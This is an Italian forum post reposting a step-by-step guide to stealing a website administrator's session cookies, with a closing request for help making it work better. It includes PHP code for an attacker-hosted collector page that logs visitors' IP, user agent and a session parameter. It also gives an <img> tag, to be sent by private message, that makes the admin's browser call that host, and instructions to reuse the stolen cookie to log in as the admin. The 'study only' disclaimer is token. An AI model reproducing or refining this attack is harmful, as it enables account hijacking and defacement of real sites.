ragazzi vorrei sapere una cosa riguardante un cookie grabber che funge a metà se così si puo dire
vi posto la guida
Allora ragazzi.... sò quante volte avrete sentito parlare di defacciare forum siti etc,.. ma poi alla fine vi siete arresi perchè le guide erano troppo complicate.. o perchè il metodo era già stato fixato...
Oggi vi spiegherò in 4 semplici passaggi come rubare i cookie all'admin di un sito... attenzione perchè RUBANDO I DATI ALL'ADMIN POTRESTE VENIRE DENUNCIATI! QUESTA GUIDA E' A SOLO SCOPO DI STUDIO. NON MI ASSUMO NESSUNA RESPONSABILITA' DELL'USO CHE NE FARETE.
Cominciamo...
Occorrente:
1° Spazio web dove uppare i file... (netsons, altervista, ecc.)
2° Link del sito/forum della vittima
3° Avere un minimo di pazienza e seguire alla lettera tutte le procedure.
Iniziamo creando 2 file.php
il primo lo chiameremo documents.php e il codice è il seguente:
CODICE
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET[c];
$time = date("Y-m-d G:i:s A");
$text = "<br><br>".$time." = ".$ip."<br><br>User Agent:".$agent."<br>Referer: ".$referer."<br>Session: ".$data."<br><br><br>";
$file = fopen('vb.php' , 'a');
fwrite($file,$text);
fclose($file);
header("Location: http://www.google.it");
?>
Il 2° lo chiameremo vb.php
CODICE
<head>
<meta http-equiv="Content-Language" content="it">
<title>Cookie Grabber - Created By Psynfected</title>
</head>
<body bgcolor="#000000">
<p align="center"><font color="#00FF00"><b><img src="http://www.allevamentolola.it/psynfected.png" width="567" height="344"></b></font></p>
<p align="left"> </p>
</body>
Adesso non resta altro che uppare i file sull'hosting... su altervista è facilissimo.. basta che create i file.php è inserite i codici.
Su gli altri hosting non sò dirvi.. potrebbe essere che richiedono Filezilla (FTP).
Adesso dopo aver creato i 2 "file" .php dovremmo avere i seguenti link:
[http://www.miosito.altervista.org/documents.php ]
[http://www.miosito.altervista.org/vb.php ]
Bene andiamo nel sito/forum della vittima logghiamoci è inviamo un messaggio privato all'admin.
Nel messaggio scrivete:
CODICE
<img src="http://www.miosito.altervista.org/documents.php">
Ovviamente dovrete sostituire miosito con il nome del vostro sito...
Quando l'admin aprira il messaggio privato non visualizzerà niente.. ma l'immagine avrà fatto il suo dovere. una volta fatto
Andate su [http://www.miosito.altervista.org/vb.php ]
La pagina è tutta nera.. selezionate la pagina e ci saranno i cookie dell'admin. adesso aprite internet incollate il codice nell'URL e magicamente sarete loggati con i dati dell'admin.
Questo è tutto.
il punto e che da un errore perchè il link e dell'mp che riceve la vittima sapete come farne uno meglio ovviamente solo per scopo informativo e didattico